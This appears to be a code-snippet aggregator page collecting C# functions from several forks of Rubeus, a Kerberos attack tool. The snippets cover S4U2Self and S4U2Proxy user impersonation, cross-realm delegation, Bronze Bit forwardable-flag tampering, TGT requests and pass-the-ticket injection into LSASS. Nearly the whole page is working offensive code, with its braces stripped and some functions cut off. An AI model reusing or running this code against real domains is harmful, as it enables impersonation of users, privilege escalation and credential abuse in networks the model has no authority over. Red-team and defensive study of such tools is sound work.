                if (error.error_code == (int)Interop.KERBEROS_ERROR.KDC_ERR_PREAUTH_REQUIRED)
                    Console.WriteLine("[!] Pre-Authentication required!");
                    foreach (PA_DATA pa_data in (List <PA_DATA>)error.e_data)
                        if (pa_data.type is Interop.PADATA_TYPE.ETYPE_INFO2)
                            if (((ETYPE_INFO2_ENTRY)pa_data.value).etype == (int)Interop.KERB_ETYPE.aes256_cts_hmac_sha1)
                                Console.WriteLine("[!]\tAES256 Salt: {0}", ((ETYPE_INFO2_ENTRY)pa_data.value).salt);
예제 #15
파일: S4U.cs 프로젝트: IMULMUL/Rubeus
        private static KRB_CRED S4U2Self(KRB_CRED kirbi, string targetUser, string targetSPN, string outfile, bool ptt, string domainController = "", string altService = "", bool self = false, bool opsec = false, bool bronzebit = false, string keyString = "", Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial, string proxyUrl = null)
            // extract out the info needed for the TGS-REQ/S4U2Self execution
            string userName = kirbi.enc_part.ticket_info[0].pname.name_string[0];
            string domain   = kirbi.enc_part.ticket_info[0].prealm;
            Ticket ticket   = kirbi.tickets[0];

            byte[]             clientKey = kirbi.enc_part.ticket_info[0].key.keyvalue;
            Interop.KERB_ETYPE etype     = (Interop.KERB_ETYPE)kirbi.enc_part.ticket_info[0].key.keytype;

            Console.WriteLine("[*] Building S4U2self request for: '{0}@{1}'", userName, domain);

            byte[] tgsBytes = TGS_REQ.NewTGSReq(userName, domain, userName, ticket, clientKey, etype, Interop.KERB_ETYPE.subkey_keymaterial, false, targetUser, false, false, opsec);

            byte[] response = null;

            if (String.IsNullOrEmpty(proxyUrl))
                string dcIP = Networking.GetDCIP(domainController);
                if (String.IsNullOrEmpty(dcIP))
                Console.WriteLine("[*] Sending S4U2self request to {0}:88", dcIP);
                response = Networking.SendBytes(dcIP, 88, tgsBytes);
                Console.WriteLine("[*] Sending S4U2self request via KDC proxy: {0}", proxyUrl);
                KDC_PROXY_MESSAGE message = new KDC_PROXY_MESSAGE(tgsBytes);
                message.target_domain = domain;
                response = Networking.MakeProxyRequest(proxyUrl, message);
            if (response == null)

            // decode the supplied bytes to an AsnElt object
            //  false == ignore trailing garbage
            AsnElt responseAsn = AsnElt.Decode(response, false);

            // check the response value
            int responseTag = responseAsn.TagValue;

            if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.TGS_REP)
                Console.WriteLine("[+] S4U2self success!");

                // parse the response to an TGS-REP
                TGS_REP rep = new TGS_REP(responseAsn);
                // KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY = 8
                byte[]        outBytes   = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, clientKey, rep.enc_part.cipher);
                AsnElt        ae         = AsnElt.Decode(outBytes, false);
                EncKDCRepPart encRepPart = new EncKDCRepPart(ae.Sub[0]);

                // now build the final KRB-CRED structure
                KRB_CRED cred = new KRB_CRED();

                // if we want to use this s4u2self ticket for authentication, change the sname
                if (!String.IsNullOrEmpty(altService) && self)
                    rep.ticket.sname.name_string[0] = altService.Split('/')[0];

                // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart

                KrbCredInfo info = new KrbCredInfo();

                // [0] add in the session key
                info.key.keytype  = encRepPart.key.keytype;
                info.key.keyvalue = encRepPart.key.keyvalue;

                // [1] prealm (domain)
                info.prealm = encRepPart.realm;

                // [2] pname (user)
                info.pname.name_type   = rep.cname.name_type;
                info.pname.name_string = rep.cname.name_string;

                // [3] flags
                info.flags = encRepPart.flags;
                if (bronzebit && !String.IsNullOrEmpty(keyString))
                    Console.WriteLine("[*] Bronze Bit flag passed, flipping forwardable flag on. Original flags: {0}", info.flags);
                    info.flags |= Interop.TicketFlags.forwardable;

                    // get user longterm key from keyString
                    byte[] key = Helpers.StringToByteArray(keyString);

                    // decrypt and decode ticket encpart
                    var decTicketPart = rep.ticket.Decrypt(key, null, true);

                    // modify flags
                    decTicketPart.flags |= Interop.TicketFlags.forwardable;

                    // encode and encrypt ticket encpart
                    byte[] encTicketData = decTicketPart.Encode().Encode();
                    byte[] encTicketPart = Crypto.KerberosEncrypt((Interop.KERB_ETYPE)rep.ticket.enc_part.etype, Interop.KRB_KEY_USAGE_AS_REP_TGS_REP, key, encTicketData);
                    rep.ticket.enc_part = new EncryptedData(rep.ticket.enc_part.etype, encTicketPart, rep.ticket.enc_part.kvno);
                    Console.WriteLine("[*] Flags changed to: {0}", info.flags);

                // add the ticket

                // [4] authtime (not required)

                // [5] starttime
                info.starttime = encRepPart.starttime;

                // [6] endtime
                info.endtime = encRepPart.endtime;

                // [7] renew-till
                info.renew_till = encRepPart.renew_till;

                // [8] srealm
                info.srealm = encRepPart.realm;

                // [9] sname
                info.sname.name_type   = encRepPart.sname.name_type;
                info.sname.name_string = encRepPart.sname.name_string;

                // if we want to use the s4u2self change the sname here too
                if (!String.IsNullOrEmpty(altService) && self)
                    Console.WriteLine("[*] Substituting alternative service name '{0}'", altService);
                    info.sname.name_string[0] = altService.Split('/')[0];

                // add the ticket_info into the cred object

                byte[] kirbiBytes = cred.Encode().Encode();

                string kirbiString = Convert.ToBase64String(kirbiBytes);

                Console.WriteLine("[*] Got a TGS for '{0}' to '{1}@{2}'", info.pname.name_string[0], info.sname.name_string[0], info.srealm);
                Console.WriteLine("[*] base64(ticket.kirbi):\r\n");

                if (Rubeus.Program.wrapTickets)
                    // display the .kirbi base64, columns of 80 chararacters
                    foreach (string line in Helpers.Split(kirbiString, 80))
                        Console.WriteLine("      {0}", line);
                    Console.WriteLine("      {0}", kirbiString);


                if (!String.IsNullOrEmpty(outfile))
                    string filename = $"{Helpers.GetBaseFromFilename(outfile)}_{info.pname.name_string[0]}_to_{info.sname.name_string[0]}@{info.srealm}{Helpers.GetExtensionFromFilename(outfile)}";
                    filename = Helpers.MakeValidFileName(filename);
                    if (Helpers.WriteBytesToFile(filename, kirbiBytes))
                        Console.WriteLine("\r\n[*] Ticket written to {0}\r\n", filename);

                if (ptt && self)
                    // pass-the-ticket -> import into LSASS
                    LSA.ImportTicket(kirbiBytes, new LUID());

            else if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.ERROR)
                // parse the response to an KRB-ERROR
                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
                Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
                Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);

예제 #16
파일: Ask.cs 프로젝트: zforks/Rubeus
        public static byte[] InnerTGT(AS_REQ asReq, Interop.KERB_ETYPE etype, string outfile, bool ptt, string domainController = "", LUID luid = new LUID(), bool describe = false, bool verbose = false)
            if ((ulong)luid != 0)
                Console.WriteLine("[*] Target LUID : {0}", (ulong)luid);

            string dcIP = Networking.GetDCIP(domainController, false);

            if (String.IsNullOrEmpty(dcIP))
                throw new RubeusException("[X] Unable to get domain controller address");

            byte[] response = Networking.SendBytes(dcIP, 88, asReq.Encode().Encode());
            if (response == null)
                throw new RubeusException("[X] No answer from domain controller");

            // decode the supplied bytes to an AsnElt object
            //  false == ignore trailing garbage
            AsnElt responseAsn = AsnElt.Decode(response, false);

            // check the response value
            int responseTag = responseAsn.TagValue;

            if (responseTag == 11)
                if (verbose)
                    Console.WriteLine("[+] TGT request successful!");

                // parse the response to an AS-REP
                AS_REP rep = new AS_REP(responseAsn);
                byte[] key;

                if (GetPKInitRequest(asReq, out PA_PK_AS_REQ pkAsReq))
                    // generate the decryption key using Diffie Hellman shared secret
                    PA_PK_AS_REP pkAsRep = (PA_PK_AS_REP)rep.padata[0].value;
                    key = pkAsReq.Agreement.GenerateKey(pkAsRep.DHRepInfo.KDCDHKeyInfo.SubjectPublicKey.DepadLeft(), new byte[0],
                                                        pkAsRep.DHRepInfo.ServerDHNonce, GetKeySize(etype));
                    // convert the key string to bytes
                    key = Helpers.StringToByteArray(asReq.keyString);

                // decrypt the enc_part containing the session key/etc.
                // TODO: error checking on the decryption "failing"...
                byte[] outBytes;

                if (etype == Interop.KERB_ETYPE.des_cbc_md5)
                    // KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY = 8
                    outBytes = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, key, rep.enc_part.cipher);
                else if (etype == Interop.KERB_ETYPE.rc4_hmac)
                    // KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY = 8
                    outBytes = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, key, rep.enc_part.cipher);
                else if (etype == Interop.KERB_ETYPE.aes128_cts_hmac_sha1)
                    // KRB_KEY_USAGE_AS_REP_EP_SESSION_KEY = 3
                    outBytes = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_AS_REP_EP_SESSION_KEY, key, rep.enc_part.cipher);
                else if (etype == Interop.KERB_ETYPE.aes256_cts_hmac_sha1)
                    // KRB_KEY_USAGE_AS_REP_EP_SESSION_KEY = 3
                    outBytes = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_AS_REP_EP_SESSION_KEY, key, rep.enc_part.cipher);
                    throw new RubeusException("[X] Encryption type \"" + etype + "\" not currently supported");

                AsnElt ae = AsnElt.Decode(outBytes, false);

                EncKDCRepPart encRepPart = new EncKDCRepPart(ae.Sub[0]);

                // now build the final KRB-CRED structure
                KRB_CRED cred = new KRB_CRED();

                // add the ticket

                // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart

                KrbCredInfo info = new KrbCredInfo();

                // [0] add in the session key
                info.key.keytype  = encRepPart.key.keytype;
                info.key.keyvalue = encRepPart.key.keyvalue;

                // [1] prealm (domain)
                info.prealm = encRepPart.realm;

                // [2] pname (user)
                info.pname.name_type   = rep.cname.name_type;
                info.pname.name_string = rep.cname.name_string;

                // [3] flags
                info.flags = encRepPart.flags;

                // [4] authtime (not required)

                // [5] starttime
                info.starttime = encRepPart.starttime;

                // [6] endtime
                info.endtime = encRepPart.endtime;

                // [7] renew-till
                info.renew_till = encRepPart.renew_till;

                // [8] srealm
                info.srealm = encRepPart.realm;

                // [9] sname
                info.sname.name_type   = encRepPart.sname.name_type;
                info.sname.name_string = encRepPart.sname.name_string;

                // add the ticket_info into the cred object

                byte[] kirbiBytes = cred.Encode().Encode();

                if (verbose)
                    string kirbiString = Convert.ToBase64String(kirbiBytes);

                    Console.WriteLine("[*] base64(ticket.kirbi):\r\n", kirbiString);

                    if (Rubeus.Program.wrapTickets)
                        // display the .kirbi base64, columns of 80 chararacters
                        foreach (string line in Helpers.Split(kirbiString, 80))
                            Console.WriteLine("      {0}", line);
                        Console.WriteLine("      {0}", kirbiString);

                if (!String.IsNullOrEmpty(outfile))
                    outfile = Helpers.MakeValidFileName(outfile);
                    if (Helpers.WriteBytesToFile(outfile, kirbiBytes))
                        if (verbose)
                            Console.WriteLine("\r\n[*] Ticket written to {0}\r\n", outfile);

                if (ptt || ((ulong)luid != 0))
                    // pass-the-ticket -> import into LSASS
                    LSA.ImportTicket(kirbiBytes, luid);

                if (describe)
                    KRB_CRED kirbi = new KRB_CRED(kirbiBytes);

            else if (responseTag == 30)
                // parse the response to an KRB-ERROR
                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
                throw new KerberosErrorException("", error);
                throw new RubeusException("[X] Unknown application tag: " + responseTag);
예제 #17
파일: S4U.cs 프로젝트: IMULMUL/Rubeus
        // to perform the 2 S4U2Self requests
        private static KRB_CRED CrossDomainS4U2Self(string userName, string targetUser, string targetDomainController, Ticket ticket, byte[] clientKey, Interop.KERB_ETYPE etype, Interop.KERB_ETYPE requestEType, bool cross = true, string altService = "", bool self = false, string requestDomain = "", bool ptt = false)
            // die if can't get IP of DC
            string dcIP = Networking.GetDCIP(targetDomainController);

            if (String.IsNullOrEmpty(dcIP))

            Console.WriteLine("[*] Requesting the cross realm 'S4U2Self' for {0} from {1}", targetUser, targetDomainController);
            byte[] tgsBytes = TGS_REQ.NewTGSReq(userName, targetUser, ticket, clientKey, etype, requestEType, cross, requestDomain);

            Console.WriteLine("[*] Sending cross realm S4U2Self request");
            byte[] response = Networking.SendBytes(dcIP, 88, tgsBytes);
            if (response == null)

            // decode the supplied bytes to an AsnElt object
            //  false == ignore trailing garbage
            AsnElt responseAsn = AsnElt.Decode(response, false);

            // check the response value
            int responseTag = responseAsn.TagValue;

            if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.TGS_REP)
                Console.WriteLine("[+] cross realm S4U2Self success!");

                // parse the response to an TGS-REP
                TGS_REP rep = new TGS_REP(responseAsn);
                // KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY = 8
                byte[]        outBytes   = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, clientKey, rep.enc_part.cipher);
                AsnElt        ae         = AsnElt.Decode(outBytes, false);
                EncKDCRepPart encRepPart = new EncKDCRepPart(ae.Sub[0]);

                // now build the final KRB-CRED structure
                KRB_CRED cred = new KRB_CRED();

                // if we want to use this s4u2self ticket for authentication, change the sname
                if (!String.IsNullOrEmpty(altService) && self)
                    rep.ticket.sname.name_type      = Interop.PRINCIPAL_TYPE.NT_SRV_INST;
                    rep.ticket.sname.name_string[0] = altService.Split('/')[0];

                // add the ticket

                // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart

                KrbCredInfo info = new KrbCredInfo();

                // [0] add in the session key
                info.key.keytype  = encRepPart.key.keytype;
                info.key.keyvalue = encRepPart.key.keyvalue;

                // [1] prealm (domain)
                info.prealm = encRepPart.realm;

                // [2] pname (user)
                info.pname.name_type   = rep.cname.name_type;
                info.pname.name_string = rep.cname.name_string;

                // [3] flags
                info.flags = encRepPart.flags;

                // [4] authtime (not required)

                // [5] starttime
                info.starttime = encRepPart.starttime;

                // [6] endtime
                info.endtime = encRepPart.endtime;

                // [7] renew-till
                info.renew_till = encRepPart.renew_till;

                // [8] srealm
                info.srealm = encRepPart.realm;

                // [9] sname
                info.sname.name_type   = encRepPart.sname.name_type;
                info.sname.name_string = encRepPart.sname.name_string;
                // if we're rewriting the S4U2Self sname, change it here too
                if (!String.IsNullOrEmpty(altService) && self)
                    Console.WriteLine("[*] Substituting alternative service name '{0}'", altService);
                    info.sname.name_type      = Interop.PRINCIPAL_TYPE.NT_SRV_INST;
                    info.sname.name_string[0] = altService.Split('/')[0];

                // add the ticket_info into the cred object

                byte[] kirbiBytes = cred.Encode().Encode();

                PrintTicket(kirbiBytes, "base64(ticket.kirbi)");

                KRB_CRED kirbi = new KRB_CRED(kirbiBytes);

                if (ptt)
                    // pass-the-ticket -> import into LSASS
                    LSA.ImportTicket(kirbiBytes, new LUID());

            else if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.ERROR)
                // parse the response to an KRB-ERROR
                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
                Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
                Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
예제 #18
파일: Ask.cs 프로젝트: zforks/Rubeus
 public KerberosErrorException(string message, KRB_ERROR krbError)
     : base(message)
     this.krbError = krbError;
예제 #19
파일: S4U.cs 프로젝트: IMULMUL/Rubeus
        private static void S4U2Proxy(KRB_CRED kirbi, string targetUser, string targetSPN, string outfile, bool ptt, string domainController = "", string altService = "", KRB_CRED tgs = null, bool opsec = false, string proxyUrl = null)
            Console.WriteLine("[*] Impersonating user '{0}' to target SPN '{1}'", targetUser, targetSPN);
            if (!String.IsNullOrEmpty(altService))
                string[] altSnames = altService.Split(',');
                if (altSnames.Length == 1)
                    Console.WriteLine("[*]   Final ticket will be for the alternate service '{0}'", altService);
                    Console.WriteLine("[*]   Final tickets will be for the alternate services '{0}'", altService);

            // extract out the info needed for the TGS-REQ/S4U2Proxy execution
            string userName = kirbi.enc_part.ticket_info[0].pname.name_string[0];
            string domain   = kirbi.enc_part.ticket_info[0].prealm;
            Ticket ticket   = kirbi.tickets[0];

            byte[]             clientKey = kirbi.enc_part.ticket_info[0].key.keyvalue;
            Interop.KERB_ETYPE etype     = (Interop.KERB_ETYPE)kirbi.enc_part.ticket_info[0].key.keytype;

            Console.WriteLine("[*] Building S4U2proxy request for service: '{0}'", targetSPN);
            TGS_REQ s4u2proxyReq = new TGS_REQ(!opsec);

            s4u2proxyReq.req_body.kdcOptions = s4u2proxyReq.req_body.kdcOptions | Interop.KdcOptions.CONSTRAINED_DELEGATION;

            s4u2proxyReq.req_body.realm = domain;

            string[] parts      = targetSPN.Split('/');
            string   serverName = parts[parts.Length - 1];

            s4u2proxyReq.req_body.sname.name_type = Interop.PRINCIPAL_TYPE.NT_SRV_INST;
            foreach (string part in parts)

            // supported encryption types

            // add in the ticket from the S4U2self response

            // needed for authenticator checksum
            byte[] cksum_Bytes = null;

            // the rest of the opsec changes
            if (opsec)
                // remove renewableok and add canonicalize
                s4u2proxyReq.req_body.kdcOptions = s4u2proxyReq.req_body.kdcOptions & ~Interop.KdcOptions.RENEWABLEOK;
                s4u2proxyReq.req_body.kdcOptions = s4u2proxyReq.req_body.kdcOptions | Interop.KdcOptions.CANONICALIZE;

                // 15 minutes in the future like genuine requests
                DateTime till = DateTime.Now;
                till = till.AddMinutes(15);
                s4u2proxyReq.req_body.till = till;

                // extra etypes

                // get hostname and hostname of SPN
                string hostName = Dns.GetHostName().ToUpper();
                string targetHostName;
                if (parts.Length > 1)
                    targetHostName = parts[1].Substring(0, parts[1].IndexOf('.')).ToUpper();
                    targetHostName = hostName;

                // create enc-authorization-data if target host is not the local machine
                if (hostName != targetHostName)
                    // authdata requires key and etype from tgs
                    byte[]             tgsKey   = tgs.enc_part.ticket_info[0].key.keyvalue;
                    Interop.KERB_ETYPE tgsEtype = (Interop.KERB_ETYPE)tgs.enc_part.ticket_info[0].key.keytype;

                    ADIfRelevant       ifrelevant   = new ADIfRelevant();
                    ADRestrictionEntry restrictions = new ADRestrictionEntry();
                    ADKerbLocal        kerbLocal    = new ADKerbLocal();
                    AsnElt authDataSeq = ifrelevant.Encode();
                    authDataSeq = AsnElt.Make(AsnElt.SEQUENCE, authDataSeq);
                    byte[] authorizationDataBytes = authDataSeq.Encode();
                    byte[] enc_authorization_data = Crypto.KerberosEncrypt(tgsEtype, Interop.KRB_KEY_USAGE_TGS_REQ_ENC_AUTHOIRZATION_DATA, tgsKey, authorizationDataBytes);
                    s4u2proxyReq.req_body.enc_authorization_data = new EncryptedData((Int32)tgsEtype, enc_authorization_data);

                // encode req_body for authenticator cksum
                AsnElt req_Body_ASN    = s4u2proxyReq.req_body.Encode();
                AsnElt req_Body_ASNSeq = AsnElt.Make(AsnElt.SEQUENCE, new[] { req_Body_ASN });
                req_Body_ASNSeq = AsnElt.MakeImplicit(AsnElt.CONTEXT, 4, req_Body_ASNSeq);
                byte[] req_Body_Bytes = req_Body_ASNSeq.CopyValue();
                cksum_Bytes = Crypto.KerberosChecksum(clientKey, req_Body_Bytes, Interop.KERB_CHECKSUM_ALGORITHM.KERB_CHECKSUM_RSA_MD5);

            // moved to end so we can have the checksum in the authenticator
            PA_DATA padata = new PA_DATA(domain, userName, ticket, clientKey, etype, opsec, cksum_Bytes);

            PA_DATA pac_options = new PA_DATA(false, false, false, true);


            byte[] s4ubytes = s4u2proxyReq.Encode().Encode();

            byte[] response2 = null;

            if (String.IsNullOrEmpty(proxyUrl))
                string dcIP = Networking.GetDCIP(domainController);
                if (String.IsNullOrEmpty(dcIP))

                Console.WriteLine("[*] Sending S4U2proxy request to domain controller {0}:88", dcIP);

                response2 = Networking.SendBytes(dcIP, 88, s4ubytes);
                Console.WriteLine("[*] Sending S4U2proxy request via KDC proxy: {0}", proxyUrl);
                KDC_PROXY_MESSAGE message = new KDC_PROXY_MESSAGE(s4ubytes);
                message.target_domain = domain;
                response2             = Networking.MakeProxyRequest(proxyUrl, message);
            if (response2 == null)

            // decode the supplied bytes to an AsnElt object
            //  false == ignore trailing garbage
            AsnElt responseAsn = AsnElt.Decode(response2, false);

            // check the response value
            int responseTag = responseAsn.TagValue;

            if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.TGS_REP)
                Console.WriteLine("[+] S4U2proxy success!");

                // parse the response to an TGS-REP
                TGS_REP rep2 = new TGS_REP(responseAsn);

                // https://github.com/gentilkiwi/kekeo/blob/master/modules/asn1/kull_m_kerberos_asn1.h#L62
                byte[]        outBytes2   = Crypto.KerberosDecrypt(etype, 8, clientKey, rep2.enc_part.cipher);
                AsnElt        ae2         = AsnElt.Decode(outBytes2, false);
                EncKDCRepPart encRepPart2 = new EncKDCRepPart(ae2.Sub[0]);

                if (!String.IsNullOrEmpty(altService))
                    string[] altSnames = altService.Split(',');

                    foreach (string altSname in altSnames)
                        // now build the final KRB-CRED structure with one or more alternate snames
                        KRB_CRED cred = new KRB_CRED();

                        // since we want an alternate sname, first substitute it into the ticket structure
                        rep2.ticket.sname.name_string[0] = altSname;

                        // add the ticket

                        // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart

                        KrbCredInfo info = new KrbCredInfo();

                        // [0] add in the session key
                        info.key.keytype  = encRepPart2.key.keytype;
                        info.key.keyvalue = encRepPart2.key.keyvalue;

                        // [1] prealm (domain)
                        info.prealm = encRepPart2.realm;

                        // [2] pname (user)
                        info.pname.name_type   = rep2.cname.name_type;
                        info.pname.name_string = rep2.cname.name_string;

                        // [3] flags
                        info.flags = encRepPart2.flags;

                        // [4] authtime (not required)

                        // [5] starttime
                        info.starttime = encRepPart2.starttime;

                        // [6] endtime
                        info.endtime = encRepPart2.endtime;

                        // [7] renew-till
                        info.renew_till = encRepPart2.renew_till;

                        // [8] srealm
                        info.srealm = encRepPart2.realm;

                        // [9] sname
                        info.sname.name_type   = encRepPart2.sname.name_type;
                        info.sname.name_string = encRepPart2.sname.name_string;

                        // if we want an alternate sname, substitute it into the encrypted portion of the KRB_CRED
                        Console.WriteLine("[*] Substituting alternative service name '{0}'", altSname);
                        info.sname.name_string[0] = altSname;

                        // add the ticket_info into the cred object

                        byte[] kirbiBytes = cred.Encode().Encode();

                        string kirbiString = Convert.ToBase64String(kirbiBytes);

                        Console.WriteLine("[*] base64(ticket.kirbi) for SPN '{0}/{1}':\r\n", altSname, serverName);

                        if (Rubeus.Program.wrapTickets)
                            // display the .kirbi base64, columns of 80 chararacters
                            foreach (string line in Helpers.Split(kirbiString, 80))
                                Console.WriteLine("      {0}", line);
                            Console.WriteLine("      {0}", kirbiString);

                        if (!String.IsNullOrEmpty(outfile))
                            string filename = $"{Helpers.GetBaseFromFilename(outfile)}_{altSname}-{serverName}{Helpers.GetExtensionFromFilename(outfile)}";
                            filename = Helpers.MakeValidFileName(filename);
                            if (Helpers.WriteBytesToFile(filename, kirbiBytes))
                                Console.WriteLine("\r\n[*] Ticket written to {0}\r\n", filename);

                        if (ptt)
                            // pass-the-ticket -> import into LSASS
                            LSA.ImportTicket(kirbiBytes, new LUID());
                    // now build the final KRB-CRED structure, no alternate snames
                    KRB_CRED cred = new KRB_CRED();

                    // if we want an alternate sname, first substitute it into the ticket structure
                    if (!String.IsNullOrEmpty(altService))
                        rep2.ticket.sname.name_string[0] = altService;

                    // add the ticket

                    // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart

                    KrbCredInfo info = new KrbCredInfo();

                    // [0] add in the session key
                    info.key.keytype  = encRepPart2.key.keytype;
                    info.key.keyvalue = encRepPart2.key.keyvalue;

                    // [1] prealm (domain)
                    info.prealm = encRepPart2.realm;

                    // [2] pname (user)
                    info.pname.name_type   = rep2.cname.name_type;
                    info.pname.name_string = rep2.cname.name_string;

                    // [3] flags
                    info.flags = encRepPart2.flags;

                    // [4] authtime (not required)

                    // [5] starttime
                    info.starttime = encRepPart2.starttime;

                    // [6] endtime
                    info.endtime = encRepPart2.endtime;

                    // [7] renew-till
                    info.renew_till = encRepPart2.renew_till;

                    // [8] srealm
                    info.srealm = encRepPart2.realm;

                    // [9] sname
                    info.sname.name_type   = encRepPart2.sname.name_type;
                    info.sname.name_string = encRepPart2.sname.name_string;

                    // add the ticket_info into the cred object

                    byte[] kirbiBytes = cred.Encode().Encode();

                    string kirbiString = Convert.ToBase64String(kirbiBytes);

                    Console.WriteLine("[*] base64(ticket.kirbi) for SPN '{0}':\r\n", targetSPN);

                    if (Rubeus.Program.wrapTickets)
                        // display the .kirbi base64, columns of 80 chararacters
                        foreach (string line in Helpers.Split(kirbiString, 80))
                            Console.WriteLine("      {0}", line);
                        Console.WriteLine("      {0}", kirbiString);

                    if (!String.IsNullOrEmpty(outfile))
                        string filename = $"{Helpers.GetBaseFromFilename(outfile)}_{targetSPN}{Helpers.GetExtensionFromFilename(outfile)}";
                        filename = Helpers.MakeValidFileName(filename);
                        if (Helpers.WriteBytesToFile(filename, kirbiBytes))
                            Console.WriteLine("\r\n[*] Ticket written to {0}\r\n", filename);

                    if (ptt)
                        // pass-the-ticket -> import into LSASS
                        LSA.ImportTicket(kirbiBytes, new LUID());
            else if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.ERROR)
                // parse the response to an KRB-ERROR
                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
                Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
                Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
예제 #20
파일: S4U.cs 프로젝트: JonTargaryen/Rubeus
        private static Ticket S4U2Self(KRB_CRED kirbi, string targetUser, string targetSPN, string outfile, bool ptt, string domainController = "", string altService = "")
            // extract out the info needed for the TGS-REQ/S4U2Self execution
            string userName = kirbi.enc_part.ticket_info[0].pname.name_string[0];
            string domain   = kirbi.enc_part.ticket_info[0].prealm;
            Ticket ticket   = kirbi.tickets[0];

            byte[]             clientKey = kirbi.enc_part.ticket_info[0].key.keyvalue;
            Interop.KERB_ETYPE etype     = (Interop.KERB_ETYPE)kirbi.enc_part.ticket_info[0].key.keytype;

            string dcIP = Networking.GetDCIP(domainController);

            if (String.IsNullOrEmpty(dcIP))

            Console.WriteLine("[*] Building S4U2self request for: '{0}@{1}'", userName, domain);

            byte[] tgsBytes = TGS_REQ.NewTGSReq(userName, domain, userName, ticket, clientKey, etype, Interop.KERB_ETYPE.subkey_keymaterial, false, targetUser);

            Console.WriteLine("[*] Sending S4U2self request");
            byte[] response = Networking.SendBytes(dcIP, 88, tgsBytes);
            if (response == null)

            // decode the supplied bytes to an AsnElt object
            //  false == ignore trailing garbage
            AsnElt responseAsn = AsnElt.Decode(response, false);

            // check the response value
            int responseTag = responseAsn.TagValue;

            if (responseTag == 13)
                Console.WriteLine("[+] S4U2self success!");

                // parse the response to an TGS-REP
                TGS_REP rep = new TGS_REP(responseAsn);
                // KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY = 8
                byte[]        outBytes   = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, clientKey, rep.enc_part.cipher);
                AsnElt        ae         = AsnElt.Decode(outBytes, false);
                EncKDCRepPart encRepPart = new EncKDCRepPart(ae.Sub[0]);

                // now build the final KRB-CRED structure
                KRB_CRED cred = new KRB_CRED();

                // add the ticket

                // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart

                KrbCredInfo info = new KrbCredInfo();

                // [0] add in the session key
                info.key.keytype  = encRepPart.key.keytype;
                info.key.keyvalue = encRepPart.key.keyvalue;

                // [1] prealm (domain)
                info.prealm = encRepPart.realm;

                // [2] pname (user)
                info.pname.name_type   = rep.cname.name_type;
                info.pname.name_string = rep.cname.name_string;

                // [3] flags
                info.flags = encRepPart.flags;

                // [4] authtime (not required)

                // [5] starttime
                info.starttime = encRepPart.starttime;

                // [6] endtime
                info.endtime = encRepPart.endtime;

                // [7] renew-till
                info.renew_till = encRepPart.renew_till;

                // [8] srealm
                info.srealm = encRepPart.realm;

                // [9] sname
                info.sname.name_type   = encRepPart.sname.name_type;
                info.sname.name_string = encRepPart.sname.name_string;

                // add the ticket_info into the cred object

                byte[] kirbiBytes = cred.Encode().Encode();

                string kirbiString = Convert.ToBase64String(kirbiBytes);

                Console.WriteLine("[*] Got a TGS for '{0}' to '{1}@{2}'", info.pname.name_string[0], info.sname.name_string[0], info.srealm);
                Console.WriteLine("[*] base64(ticket.kirbi):\r\n");

                // display the .kirbi base64, columns of 80 chararacters
                foreach (string line in Helpers.Split(kirbiString, 80))
                    Console.WriteLine("      {0}", line);

                if (!String.IsNullOrEmpty(outfile))
                    string filename = $"{Helpers.GetBaseFromFilename(outfile)}_{info.pname.name_string[0]}_to_{info.sname.name_string[0]}@{info.srealm}{Helpers.GetExtensionFromFilename(outfile)}";
                    filename = Helpers.MakeValidFileName(filename);
                    if (Helpers.WriteBytesToFile(filename, kirbiBytes))
                        Console.WriteLine("\r\n[*] Ticket written to {0}\r\n", filename);

            else if (responseTag == 30)
                // parse the response to an KRB-ERROR
                KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]);
                Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code);
                Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);

예제 #21
 private void ReportKrbError(string username, KRB_ERROR krbError)
     this.reporter.ReportKrbError(this.domain, username, krbError);
예제 #22
        public static void UserPassword(KRB_CRED kirbi, string newPassword, string domainController = "", string targetUser = null)
